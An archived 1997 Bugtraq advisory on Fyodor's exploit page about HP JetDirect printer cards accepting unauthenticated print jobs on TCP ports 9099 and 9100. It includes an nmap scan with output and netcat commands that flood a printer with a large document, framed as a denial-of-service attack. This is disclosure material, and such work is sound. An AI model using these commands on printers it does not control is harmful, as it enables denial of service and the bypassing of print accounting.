JetDirect printer card problem
Description: | The JetDirect card with TCP/IP enabled will by default open high ports (9099 and 9100) which can be used to print arbitrary files |
Author: | Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR> |
Compromise: | DoS Attack (send 500 page documents), or free printing if you have access to the printer in question |
Vulnerable Systems: | Those using JetDirect with TCP/IP enabled and the default unrestricted connections. |
Date: | 4 October 1997 |
Notes: | Cool! He used my Details |
---|
|
Date: Sat, 4 Oct 1997 18:02:01 -0300
From: Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>
To: BUGTRAQ@NETSPACE.ORG
Subject: HP Laserjet 4M Plus DirectJet Problem
I don't know if this is a well known HP printer problem, but
I've found no references of it on the bugtraq archives.
It is possible to bypass lpd and page accounting on a HP
PostScript printer attached to an ethernet card sending PostScript
directly to tcp ports 9099 and 9100 from any machine over the network.
I've tested on a HP Laserjet 4M Plus DirectJet, connecting to
port 9099 or 9100 tcp and printing PostScript documents.
There is no way to tell the printer to accept connections only
from a range of valid IPs. Also, it is possible to telnet to the
printer and change the printer IP or disable logging. Protect the
printer inside a firewall appears to be the only safe way.
Find this kind of printer on a network is quite easy with a
good port scanner. It responds to ping and listens on tcp ports 23,
515, 9099 and 9100.
# nmap -P -s printer.foo.bar.org -p 23,515,9099,9100
Starting nmap V 1.25 by Fyodor (fyodor@nmap.org, www.dhp.com/~fyodor/nmap/
Hint: The -v option notifies you of open ports as they are found.
Host printer.foo.bar.org (xx.yy.ww.zz) appears to be up ... good.
Open ports on printer.foo.bar.org (xx.yy.ww.zz):
Port Number Protocol Service
23 tcp telnet
515 tcp printer
9099 tcp unknown
9100 tcp unknown
To print a PostScript document just send it to port 9099 or
9100. Netcat will do:
$ nc printer.foo.bar.org 9099 < huge_document.ps
or
$ nc printer.foo.bar.org 9100 < huge_document.ps
Anyone can confirm this with other printers? I think HP 5M is
also vulnerable, but I've not tested.
Klaus.
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: